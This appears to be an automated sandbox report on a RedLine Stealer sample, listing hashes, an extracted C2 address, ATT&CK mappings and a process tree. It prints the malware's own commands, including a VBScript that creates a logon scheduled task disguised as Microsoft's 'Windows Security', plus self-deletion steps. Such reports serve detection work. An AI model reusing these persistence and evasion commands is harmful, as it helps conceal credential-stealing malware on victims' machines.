Overview

overview

10

Static

static

10

dridex

windows10_x64

10

Analysis

  • max time kernel
    151s
  • max time network
    152s
  • platform
    windows10_x64
  • resource
    win10-20220310-en
  • submitted
    21-03-2022 15:40

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    18c13dae1f6ece30de48551703b4d96602eba3cd67bdf6c1d852069b217f2973.exe

  • Size

    102KB

  • MD5

    37bd9e1832978b6c5044fdc28694c765

  • SHA1

    a6840f04877701c607d8afa373ee6ec86a4a3975

  • SHA256

    18c13dae1f6ece30de48551703b4d96602eba3cd67bdf6c1d852069b217f2973

  • SHA512

    d0e7972c9d67384ac59c76f763a1f8ab3fec921db68beee321cb91e47a35fafa789396baee10c8ade0d1585c450a2f4f5ce2a2b05d1b6466ee985bcfaced79e4

Score
10/10
redline@jabka9983discoveryinfostealerspywarestealer

Malware Config

Extracted

Family

redline

Botnet

@JABKA9983

C2

65.108.82.103:15914

Attributes
  • auth_value

    3da459a4f4fcd6fe99288a78b3680c31

Signatures

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

    infostealerredline
  • RedLine Payload 1 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 2 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
    spyware
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Delays execution with timeout.exe 1 IoCs
    evasion
  • Kills process with taskkill 1 IoCs
    evasion
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 7 IoCs
  • Suspicious use of WriteProcessMemory 26 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\18c13dae1f6ece30de48551703b4d96602eba3cd67bdf6c1d852069b217f2973.exe
    "C:\Users\Admin\AppData\Local\Temp\18c13dae1f6ece30de48551703b4d96602eba3cd67bdf6c1d852069b217f2973.exe"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2552
    • C:\Users\Admin\AppData\Local\Temp\build.exe
      "C:\Users\Admin\AppData\Local\Temp\build.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:912
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c "C:\Users\Admin\AppData\Roaming\Microsoft\Security\Windows Security.exe"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1440
        • C:\Users\Admin\AppData\Roaming\Microsoft\Security\Windows Security.exe
          "C:\Users\Admin\AppData\Roaming\Microsoft\Security\Windows Security.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: GetForegroundWindowSpam
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:3832
          • C:\Windows\System32\cmd.exe
            "C:\Windows\System32\cmd.exe" /c @echo off & echo const TriggerTypeLogon=9 : const ActionTypeExecutable=0 : const TASK_LOGON_INTERACTIVE_TOKEN=3 : const createOrUpdateTask=6 : Set service=CreateObject("Schedule.Service") : call service.Connect() : Dim rootFolder : Set rootFolder=service.GetFolder("") : Dim taskDefinition : Set taskDefinition=service.NewTask(0) : Dim regInfo : Set regInfo=taskDefinition.RegistrationInfo : regInfo.Author="Microsoft Corporation" : regInfo.Description="Windows Security is a software application that safeguards a system from malware. It was an anti-spyware program built to fight unauthorized access and protect Windows computers from unwanted software." : Dim settings : Set settings=taskDefinition.Settings : settings.StartWhenAvailable=True : settings.ExecutionTimeLimit="PT0S" : settings.AllowHardTerminate=False : settings.IdleSettings.StopOnIdleEnd=False : settings.DisallowStartIfOnBatteries=False : settings.StopIfGoingOnBatteries=False : Dim triggers : Set triggers=taskDefinition.Triggers : Dim trigger : Set trigger=triggers.Create(TriggerTypeLogon) : userId=CreateObject("WScript.Shell").ExpandEnvironmentStrings("%USERNAME%") : trigger.Id="LogonTriggerId" : trigger.UserId=userId : Dim Action : Set Action=taskDefinition.Actions.Create(ActionTypeExecutable) : Action.Path="C:\Users\Admin\AppData\Roaming\Microsoft\Security\Windows Security.exe" : taskDefinition.Principal.UserId=userId : taskDefinition.Principal.LogonType=TASK_LOGON_INTERACTIVE_TOKEN : call rootFolder.RegisterTaskDefinition("Windows Security", taskDefinition, createOrUpdateTask, Empty, Empty, TASK_LOGON_INTERACTIVE_TOKEN) > C:\Users\Admin\AppData\Local\Temp\tmpCCB4.vbs & cscript //nologo C:\Users\Admin\AppData\Local\Temp\tmpCCB4.vbs & del C:\Users\Admin\AppData\Local\Temp\tmpCCB4.vbs /f /q & exit
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:192
            • C:\Windows\system32\cscript.exe
              cscript //nologo C:\Users\Admin\AppData\Local\Temp\tmpCCB4.vbs
              6⤵
                PID:1888
            • C:\Windows\SYSTEM32\cmd.exe
              "cmd.exe" /c powershell -command "$driverDesc = (Get-ItemProperty -Path \"HKLM:\\SYSTEM\\ControlSet001\\Control\\Class\\{4d36e968-e325-11ce-bfc1-08002be10318}\\0*\" -Name HardwareInformation.DriverDesc -ErrorAction SilentlyContinue).\"HardwareInformation.DriverDesc\"; $driverDesc" & exit
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:680
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell -command "$driverDesc = (Get-ItemProperty -Path \"HKLM:\\SYSTEM\\ControlSet001\\Control\\Class\\{4d36e968-e325-11ce-bfc1-08002be10318}\\0*\" -Name HardwareInformation.DriverDesc -ErrorAction SilentlyContinue).\"HardwareInformation.DriverDesc\"; $driverDesc"
                6⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:2916
            • C:\Windows\SYSTEM32\cmd.exe
              "cmd.exe" /c powershell -command "$qwMemorySize = (Get-ItemProperty -Path \"HKLM:\\SYSTEM\\ControlSet001\\Control\\Class\\{4d36e968-e325-11ce-bfc1-08002be10318}\\0*\" -Name HardwareInformation.qwMemorySize -ErrorAction SilentlyContinue).\"HardwareInformation.qwMemorySize\"; [math]::round($qwMemorySize/1MB)" & exit
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:816
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell -command "$qwMemorySize = (Get-ItemProperty -Path \"HKLM:\\SYSTEM\\ControlSet001\\Control\\Class\\{4d36e968-e325-11ce-bfc1-08002be10318}\\0*\" -Name HardwareInformation.qwMemorySize -ErrorAction SilentlyContinue).\"HardwareInformation.qwMemorySize\"; [math]::round($qwMemorySize/1MB)"
                6⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:516
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /c taskkill /F /PID 912 & powershell -command "$ErrorActionPreference= 'silentlycontinue'; (Get-WmiObject Win32_Process | Where-Object { $_.Path.StartsWith('C:\Users\Admin\AppData\Local\Temp\build.exe') }).Terminate()" & timeout 3 > nul & del /F /S /Q /A "C:\Users\Admin\AppData\Local\Temp\build.exe" & exit
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:3220
          • C:\Windows\system32\taskkill.exe
            taskkill /F /PID 912
            4⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:4040
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -command "$ErrorActionPreference= 'silentlycontinue'; (Get-WmiObject Win32_Process | Where-Object { $_.Path.StartsWith('C:\Users\Admin\AppData\Local\Temp\build.exe') }).Terminate()"
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3148
          • C:\Windows\system32\timeout.exe
            timeout 3
            4⤵
            • Delays execution with timeout.exe
            PID:1248

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Initial Access

    Execution

    Persistence

    Privilege Escalation

    Defense Evasion

    Credential Access

    Credentials in Files

    2
    T1081

    Discovery

    Query Registry

    1
    T1012

    System Information Discovery

    1
    T1082

    Lateral Movement

    Collection

    Data from Local System

    2
    T1005

    Exfiltration

    Command and Control

    Web Service

    1
    T1102

    Impact

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
      MD5

      17286868c0a043ae5d2ff5798b6a3163

      SHA1

      b83b23cd57c7fb2c937f5bc18aeb7ddc955b5401

      SHA256

      40321e18ed0b9eb7e3bc937d3e207ea2039ff45267483ddb4a51f7974475dac6

      SHA512

      e15c11982c0569a389a7dbd0889edd1ef9a8ffb21c0e8ffadebc10e1353f4485524b18ca8e041c66c98d05fb984544da122755e6c2a25728453aeaf4175bdee1

      Download Submit
    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      MD5

      9a3b058eeb3866979a8ae40c50afcad5

      SHA1

      5cb721e20622946ae015bb8f29fd731d9c722602

      SHA256

      a68952b9b61d0da3111b16a8572c35c16f06b95d33b0f7da73ef831584abb9da

      SHA512

      0c741adc8ab9e9a91429dbef62ced45a5887da080caae289a86e2b5f9a721733d8e0d000765fa826805d9288d9485ed42b3a7f0e87e042d142b0b6eeb41f6cec

      Download Submit
    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      MD5

      9a3b058eeb3866979a8ae40c50afcad5

      SHA1

      5cb721e20622946ae015bb8f29fd731d9c722602

      SHA256

      a68952b9b61d0da3111b16a8572c35c16f06b95d33b0f7da73ef831584abb9da

      SHA512

      0c741adc8ab9e9a91429dbef62ced45a5887da080caae289a86e2b5f9a721733d8e0d000765fa826805d9288d9485ed42b3a7f0e87e042d142b0b6eeb41f6cec

      Download Submit
    • C:\Users\Admin\AppData\Local\Temp\build.exe
      MD5

      d1db0a92a4c72b887cc16a32e9d285a8

      SHA1

      87d0c2dffc47615b70557399c8cf937f55599713

      SHA256

      95fc31e41a4134e57b2ebc1f31f0857dcf98ba3a0f78f0675e2c8c45c32bc19b

      SHA512

      31557170e2485584ace194d9337d073e73c18e42806edf796c1fef981301c6ae2748a1d72406545380e0b7f099c0cb4e4337b7d61673f825b49a3cbf1b87de71

      Download Submit
    • C:\Users\Admin\AppData\Local\Temp\build.exe
      MD5

      d1db0a92a4c72b887cc16a32e9d285a8

      SHA1

      87d0c2dffc47615b70557399c8cf937f55599713

      SHA256

      95fc31e41a4134e57b2ebc1f31f0857dcf98ba3a0f78f0675e2c8c45c32bc19b

      SHA512

      31557170e2485584ace194d9337d073e73c18e42806edf796c1fef981301c6ae2748a1d72406545380e0b7f099c0cb4e4337b7d61673f825b49a3cbf1b87de71

      Download Submit
    • C:\Users\Admin\AppData\Local\Temp\tmpCCB4.vbs
      MD5

      d40d18b617c382f94c2cf8f4ee7e9682

      SHA1

      7669d7e3b770f35be2a516ffacd481437eb93f3e

      SHA256

      5459eaee5107d59891a50f3d2b6d7eef0ac30216ae66e0e6a010f34c23d2f770

      SHA512

      22101058b8d14b320216e2f698f9f985e6f52e821c62c3fb9a09b9eb0d7537339676e11728ed978ac9191c032335d1d86c56b34065b9f22f85e43a9bdeaafbac

      Download Submit
    • C:\Users\Admin\AppData\Roaming\Microsoft\Security\Windows Security.exe
      MD5

      d1db0a92a4c72b887cc16a32e9d285a8

      SHA1

      87d0c2dffc47615b70557399c8cf937f55599713

      SHA256

      95fc31e41a4134e57b2ebc1f31f0857dcf98ba3a0f78f0675e2c8c45c32bc19b

      SHA512

      31557170e2485584ace194d9337d073e73c18e42806edf796c1fef981301c6ae2748a1d72406545380e0b7f099c0cb4e4337b7d61673f825b49a3cbf1b87de71

      Download Submit
    • C:\Users\Admin\AppData\Roaming\Microsoft\Security\Windows Security.exe
      MD5

      d1db0a92a4c72b887cc16a32e9d285a8

      SHA1

      87d0c2dffc47615b70557399c8cf937f55599713

      SHA256

      95fc31e41a4134e57b2ebc1f31f0857dcf98ba3a0f78f0675e2c8c45c32bc19b

      SHA512

      31557170e2485584ace194d9337d073e73c18e42806edf796c1fef981301c6ae2748a1d72406545380e0b7f099c0cb4e4337b7d61673f825b49a3cbf1b87de71

      Download Submit
    • memory/516-228-0x00007FFCF0290000-0x00007FFCF0C7C000-memory.dmp
      Filesize

      9.9MB

      Download
    • memory/516-230-0x0000023DBD080000-0x0000023DBD082000-memory.dmp
      Filesize

      8KB

      Download
    • memory/516-232-0x0000023DBD083000-0x0000023DBD085000-memory.dmp
      Filesize

      8KB

      Download
    • memory/912-140-0x00007FFCF0290000-0x00007FFCF0C7C000-memory.dmp
      Filesize

      9.9MB

      Download
    • memory/912-137-0x00000000005E0000-0x00000000005E6000-memory.dmp
      Filesize

      24KB

      Download
    • memory/912-136-0x00000000004A0000-0x00000000004E0000-memory.dmp
      Filesize

      256KB

      Download
    • memory/2552-128-0x0000000006650000-0x0000000006B4E000-memory.dmp
      Filesize

      5.0MB

      Download
    • memory/2552-127-0x0000000005A70000-0x0000000005B02000-memory.dmp
      Filesize

      584KB

      Download
    • memory/2552-132-0x0000000007300000-0x00000000074C2000-memory.dmp
      Filesize

      1.8MB

      Download
    • memory/2552-131-0x0000000006FE0000-0x0000000007030000-memory.dmp
      Filesize

      320KB

      Download
    • memory/2552-130-0x0000000006550000-0x00000000065B6000-memory.dmp
      Filesize

      408KB

      Download
    • memory/2552-129-0x0000000005B10000-0x0000000005B2E000-memory.dmp
      Filesize

      120KB

      Download
    • memory/2552-118-0x0000000000C50000-0x0000000000C70000-memory.dmp
      Filesize

      128KB

      Download
    • memory/2552-133-0x0000000007A00000-0x0000000007F2C000-memory.dmp
      Filesize

      5.2MB

      Download
    • memory/2552-126-0x0000000005950000-0x00000000059C6000-memory.dmp
      Filesize

      472KB

      Download
    • memory/2552-119-0x0000000073A50000-0x000000007413E000-memory.dmp
      Filesize

      6.9MB

      Download
    • memory/2552-120-0x0000000005B40000-0x0000000006146000-memory.dmp
      Filesize

      6.0MB

      Download
    • memory/2552-125-0x0000000005640000-0x000000000568B000-memory.dmp
      Filesize

      300KB

      Download
    • memory/2552-121-0x00000000055A0000-0x00000000055B2000-memory.dmp
      Filesize

      72KB

      Download
    • memory/2552-122-0x00000000056D0000-0x00000000057DA000-memory.dmp
      Filesize

      1.0MB

      Download
    • memory/2552-123-0x0000000005530000-0x0000000005B36000-memory.dmp
      Filesize

      6.0MB

      Download
    • memory/2552-124-0x0000000005600000-0x000000000563E000-memory.dmp
      Filesize

      248KB

      Download
    • memory/2916-187-0x0000019F7ACE0000-0x0000019F7ACE2000-memory.dmp
      Filesize

      8KB

      Download
    • memory/2916-186-0x00007FFCF0290000-0x00007FFCF0C7C000-memory.dmp
      Filesize

      9.9MB

      Download
    • memory/2916-188-0x0000019F7ACE3000-0x0000019F7ACE5000-memory.dmp
      Filesize

      8KB

      Download
    • memory/3148-160-0x000002186CDF3000-0x000002186CDF5000-memory.dmp
      Filesize

      8KB

      Download
    • memory/3148-158-0x000002186CDF0000-0x000002186CDF2000-memory.dmp
      Filesize

      8KB

      Download
    • memory/3148-156-0x00007FFCF0290000-0x00007FFCF0C7C000-memory.dmp
      Filesize

      9.9MB

      Download
    • memory/3148-153-0x000002186F0B0000-0x000002186F126000-memory.dmp
      Filesize

      472KB

      Download
    • memory/3148-149-0x000002186CDC0000-0x000002186CDE2000-memory.dmp
      Filesize

      136KB

      Download
    • memory/3832-185-0x0000000003370000-0x000000001B370000-memory.dmp
      Filesize

      384.0MB

      Download
    • memory/3832-142-0x000000001BDB0000-0x000000001BDB2000-memory.dmp
      Filesize

      8KB

      Download
    • memory/3832-141-0x00007FFCF0290000-0x00007FFCF0C7C000-memory.dmp
      Filesize

      9.9MB

      Download